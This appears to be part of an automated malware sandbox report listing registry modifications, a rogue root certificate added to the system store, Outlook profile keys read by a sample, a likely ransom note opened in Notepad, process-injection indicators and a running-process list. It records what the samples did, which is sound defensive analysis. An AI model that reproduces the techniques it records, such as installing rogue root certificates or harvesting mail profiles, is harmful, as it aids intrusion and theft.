| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\shell\open\command | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win64\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationDescription = "Browse the web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Program Files\\ProcessMonitor\\Procmon64.exe\",0" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\ = "Microsoft Edge HTML Document" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\shell\runas\ProgrammaticAccessOnly | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --single-argument %1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\shell\runas\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --do-not-de-elevate --single-argument %1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.htm | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\DisplayName = "PDF Preview Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open\command | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ = "Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML\ = "ProcMon.Logfile.1" | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.shtml\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithProgIds\MSEdgeMHT | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML | C:\Program Files\sysint\Procmon64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\runas | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\runas\ProgrammaticAccessOnly | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\AppUserModelId = "MSEdge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\AppUserModelId = "MSEdge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Users\\Admin\\Downloads\\ProcessMonitor\\Procmon64.exe\",0" | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\open | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\ProcessMonitor.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Program Files\sysint\Procmon64.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Files\srtware.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| N/A | N/A | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| N/A | N/A | C:\Program Files\sysint\Procmon64.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27351 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4251183b-c529-41a7-8d91-8e53ac557d75} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
